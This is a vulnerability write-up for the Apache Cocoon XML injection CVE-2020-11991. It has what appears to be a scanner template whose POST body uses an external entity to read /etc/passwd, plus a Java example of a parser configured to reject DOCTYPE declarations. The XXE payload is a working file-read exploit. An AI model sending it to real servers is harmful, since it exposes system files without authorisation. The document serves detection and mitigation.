Vulnerability description
Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
id: CVE-2020-11991

info:
  name: Apache Cocoon 2.1.12 XML Injection
  author: pikpikcu
  severity: high
  description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
  reference:
    - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11991
    - https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
    - http://wiki.peiqi.tech/wiki/webserver/Apache/Apache%20Cocoon%20XML%E6%B3%A8%E5%85%A5%20CVE-2020-11991.html

rules:
  r0:
    request:
      method: POST
      path: /v2/api/product/manger/getInfo
      headers:
        Content-Type: "text/xml"
      body: |
        <!--?xml version="1.0" ?-->
        <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
        <userInfo>
          <firstName>John</firstName>
          <lastName>&ent;</lastName>
        </userInfo>
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
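The fix on the server side is to parse untrusted XML with a parser that refuses DOCTYPE declarations and never resolves external entities. The following is an added Java example (not part of this template and not Cocoon's own code) showing the JAXP configuration a component like StreamGenerator needs; the class and method names are mine, and the two input documents are constructed from the body above.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

public class HardenedXmlParse {

    // SAX parser that rejects any DOCTYPE and disables external entity and
    // DTD loading, so an entity pointing at file:///etc/passwd is never read.
    static SAXParser hardenedParser() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        return f.newSAXParser();
    }

    // Returns true if the document was accepted, false if the hardened parser
    // rejected it (for example because it carries a DOCTYPE).
    static boolean parseUntrusted(String xml) throws Exception {
        SAXParser p = hardenedParser();
        try {
            p.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)),
                    new DefaultHandler());
            return true;
        } catch (SAXParseException e) {
            System.err.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: the XXE body from the template and a benign request.
        String xxe = "<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n"
                   + "<userInfo><firstName>John</firstName><lastName>&ent;</lastName></userInfo>";
        String benign = "<userInfo><firstName>John</firstName><lastName>Doe</lastName></userInfo>";
        System.out.println("xxe body accepted: " + parseUntrusted(xxe));
        System.out.println("benign body accepted: " + parseUntrusted(benign));
    }
}
```

With the DOCTYPE disallowed, the scanner's `root:` match in the response can no longer occur, which is the condition the rule above tests for.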